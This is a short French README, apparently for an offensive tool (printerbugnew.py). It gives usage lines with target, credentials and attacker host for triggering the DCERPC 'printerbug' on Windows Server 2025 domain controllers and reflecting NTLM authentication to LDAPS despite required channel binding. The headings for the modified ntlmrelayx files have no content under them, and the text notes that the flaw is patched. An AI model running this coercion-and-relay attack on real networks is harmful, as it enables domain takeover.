
La version printerbug.py uniquement DCERPC
printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]
printerbugnew.py 192.168.1.100
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

Cet exploit par réflexion fonctionne uniquement sur W2025 avec le « nouveau » printerbug (DCERPC au lieu de Named Pipes).
Vous devrez modifier ntlmrelayx à quelques endroits pour que cela fonctionne. Après cela, vous pouvez déclencher à distance le bug d'impression sur un contrôleur de domaine W2025 et refléter l'authentification via LDAPS(!), même si les liaisons de canal sont REQUISES
ldaprelayclient.py:

rpcrelayserver.py
et relayez ;)

La vulnérabilité a été corrigée dans le Patch Tuesday de septembre 2025 : https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918
Le correctif garantit que le MIC est toujours calculé, même lorsque le message de type 3 est vide.
Merci à l'auteur de ce CVE pour un indice précieux :)